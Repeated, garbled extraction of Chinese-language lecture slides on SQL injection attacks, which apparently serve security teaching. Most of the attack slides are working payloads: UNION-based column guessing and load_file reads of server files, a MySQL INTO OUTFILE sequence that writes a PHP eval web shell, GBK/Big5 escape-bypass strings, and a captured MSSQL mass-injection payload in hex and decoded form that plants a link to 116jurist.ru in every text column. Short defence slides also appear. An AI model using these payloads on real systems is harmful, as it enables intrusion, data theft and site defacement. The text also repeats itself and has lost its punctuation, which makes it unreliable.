655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
